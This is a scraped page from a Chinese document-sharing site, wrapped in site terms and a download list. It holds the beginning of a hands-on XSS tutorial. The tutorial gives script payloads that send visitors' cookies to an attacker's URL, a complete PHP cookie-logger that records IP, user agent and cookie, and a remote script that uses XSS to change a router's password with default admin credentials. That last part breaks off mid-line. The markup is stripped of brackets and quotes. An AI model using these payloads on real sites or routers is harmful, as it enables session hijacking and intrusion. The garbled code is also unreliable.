- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
跨站脚本攻击实例解析
作者:泉哥
主页:
前言
跨站攻击,即Cross Site Script Execution(通常简写为XSS,因为CSS与层叠样式表img src=# onerror=alert(head)/img,为便于区别,我将提示语句更改为对应的名称,前三项在首页可触发脚本,后两项需打开文章才可触发,测试结果如图1、2所示:
图1(在首页触发)
图2(打开文章触发)
对于其它网站的测试基本也是大同小异,除了手工测试外,你还可使用其它一些自动扫描工具,比如Acunetix Web Scanner……
漏洞利用
一、窃取Cookie
对于跨站的攻击方法,使用最多的莫过于cookie窃取了,获取cookie后直接借助“明小子”工具或其它可修改cookie的浏览器(如装有Cookies Edit插件的Firefox)将cookie修改为获取的cookie,这样即可获得博客的管理权限。
首先,我们在自定义模板的head代码模块中写入
scriptdocument.write(img src=http://localhost/test.php?cookie=+document.cookie+ width=0 height=0 border=0 /);/script
或者
scriptdocument.location = http://localhost/test.php?cookie= + document.cookie;/script
这里我把脚本放在本机上,你可以根据脚本地址来更改上面的localhost地址。以上两个均可达到同等效果,但就隐蔽性而言,前者的隐蔽性会更强些,读者可自行选择,当然也有其它语句可达到一样的目的,就看你如何发挥了。接下来我们来编写上面的test.php文件,它主要用于获取对方的cookie,其源代码如下:
?php
$cookie = $_GET[cookie]; //以GET方式获取cookie变量值
$ip = getenv (REMOTE_ADDR); //远程主机IP地址
$time=date(Y-m-d g:i:s); //以年-月-日 时:分:秒的格式显示时间
$referer=getenv (HTTP_REFERER); //链接来源
$agent = $_SERVER[HTTP_USER_AGENT]; //用户浏览器类型
$fp = fopen(cookie.txt, a); //打开cookie.txt,若不存在则创建它
fwrite($fp, IP: .$ip. \n Date and Time: .$time. \n User Agent:.$agent.\n Referer: .$referer.\n Cookie: .$cookie.\n\n\n); //写入文件
fclose($fp); //关闭文件
header(Location: ); //将网页重定向到百度,增强性
?
为测试地址,访问后我们打开http://localhost/cookie.txt 看看cookie.txt 文件是否被创建并写入数据,结果如图3所示:
图3
很明显,我们已经成功窃取到cookie了,剩下的事相信大家都知道,这里就不再赘述。
二.渗透路由器
对于处于内网中的用户,我们可以利用XSS来更改路由器密码。我们可以借助默认的密码来登陆路由器,比如URL:http://admin:admin@,其实很多路由器都是使用默认密码,我这里这台也是如此,直接以admin作为用户名和密码。首先我们先利用Firefox插件Live HTTP headers获取请求头,如图4所示:
图4
因此我们可以在head代码模块中写入以下语句:
script src=http://localhost/1.js/script
其中1.js源码如下:
window.open(http://admin:admin@/userRpm/ChangeLoginPwdRpm.htm?oldname=adminoldpassword=adminnewname=administratornewpassword=passwordnewpassword2=passwo
您可能关注的文档
最近下载
- 2025年新疆投资发展集团有限责任公司人员招聘笔试备考题库带答案详解(名师推荐).docx
- 在线网课学习课堂《临床伦理与科研道德(山东大学)》单元测试考核答案.docx VIP
- 浅谈直驱风力发电机组偏航异响原因分析及结构优化.pdf VIP
- 商务与经济统计(原书第14版)Ch11.pptx VIP
- 化工厂安全考试题.doc VIP
- 大学生女性健康科普知识讲座幻灯片.ppt
- 《阿Q正传》课件63张.pptx VIP
- 渥太华自伤量表.docx VIP
- 【2025年新版交规题库】2025年版12123学法减分题库(学法减分300题).docx
- 商务与经济统计(原书第14版)Ch16.pptx VIP
文档评论(0)